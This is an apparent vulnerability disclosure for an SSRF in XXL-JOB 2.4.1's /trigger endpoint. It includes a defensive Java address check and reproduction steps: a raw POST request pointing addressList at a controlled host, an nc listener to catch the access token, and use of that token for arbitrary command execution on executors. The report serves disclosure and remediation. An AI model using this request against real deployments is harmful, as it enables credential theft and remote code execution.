XXL-JOB is a distributed task scheduling platform written in Java and maintained by the XXL (XXL-JOB) community.
There is an SSRF vulnerability in xxl-job-2.4.1/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobInfoController.java of XXL-JOB 2.4.1. It originates in the /trigger endpoint, which sends a request directly to the address given in the addressList parameter without checking whether that address is a valid (registered) executor address. Through this SSRF an attacker obtains the XXL-JOB-ACCESS-TOKEN and can then call any executor, leading to arbitrary command execution on the executor.
Calling the /trigger interface only requires a low-privilege user of the platform.
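The missing check described above, as an added example and not XXL-JOB's own code: the caller-supplied addressList is accepted only if every address is one the job's executor group has actually registered. The method name, the registry list shape and the sample addresses are assumptions for illustration; the group permission check mentioned in the report is noted in a comment rather than modelled.

```java
import java.util.*;

// Hypothetical hardening for JobInfoController#triggerJob (added example,
// not the project's code): reject addressList entries that are not
// registered executors of the job's group, so /trigger cannot be pointed
// at an arbitrary host.
public class TriggerAddressCheck {

    /**
     * Returns the accepted addresses, or throws if any address is unknown.
     * Comparison is exact after trimming: the registry holds the address
     * in the form the executor reported (assumed here to be "http://host:port/"),
     * so an unnormalised variant is rejected, which errs on the safe side.
     * An empty addressList means "use normal routing", as before.
     * Note: the controller should additionally verify the caller has
     * permission on the job's executor group before reaching this point.
     */
    public static List<String> validateAddressList(String addressList, List<String> registryList) {
        if (addressList == null || addressList.trim().isEmpty()) {
            return Collections.emptyList();
        }
        Set<String> registered = new HashSet<>();
        for (String r : registryList) {
            registered.add(r.trim());
        }
        List<String> accepted = new ArrayList<>();
        for (String addr : addressList.split(",")) {
            String a = addr.trim();
            if (a.isEmpty()) {
                continue;
            }
            if (!registered.contains(a)) {
                throw new IllegalArgumentException("addressList contains an unregistered executor address: " + a);
            }
            accepted.add(a);
        }
        return accepted;
    }

    public static void main(String[] args) {
        // Constructed sample registry for one executor group (documentation addresses, not real hosts).
        List<String> registry = Arrays.asList("http://192.0.2.10:9999/", "http://192.0.2.11:9999/");
        System.out.println("accepted: " + validateAddressList("http://192.0.2.10:9999/", registry));
        try {
            validateAddressList("http://203.0.113.5:9999/", registry);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```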
Steps to reproduce the behavior
Conditions:
- XXL-JOB <= 2.4.1 (latest version)
- A regular user account
- A known JobId (which can be obtained by enumeration)
1. Create a normal user (normal) without any executor permissions.
2. Using the normal user, call the interface with the addressList parameter set to the address of an HTTP server you control; the target server then sends the XXL-JOB-ACCESS-TOKEN directly to that address.
POST /xxl-job-admin/jobinfo/trigger HTTP/1.1
Host: 10.248.28.212:8080
Content-Length: 69
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.248.28.212:8080
Referer: http://10.248.28.212:8080/xxl-job-admin/jobinfo
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XXL_JOB_LOGIN_IDENTITY=7b226964223a322c22757365726e616d65223a2274657374222c2270617373776f7264223a226531306164633339343962613539616262653536653035376632306638383365222c22726f6c65223a302c227065726d697373696f6e223a22227d
Connection: close

id=1&executorParam=test&addressList=http%3A%2F%2F10.248.28.212%3A9999
3. Listen with nc on the VPS to receive the token.
4. Use the token to call the task trigger interface of the executor's RESTful API to execute arbitrary commands.
Which version of XXL-JOB are you using?
2.4.1 (latest)
Other information
The vulnerability is similar to CVE-2022-43183.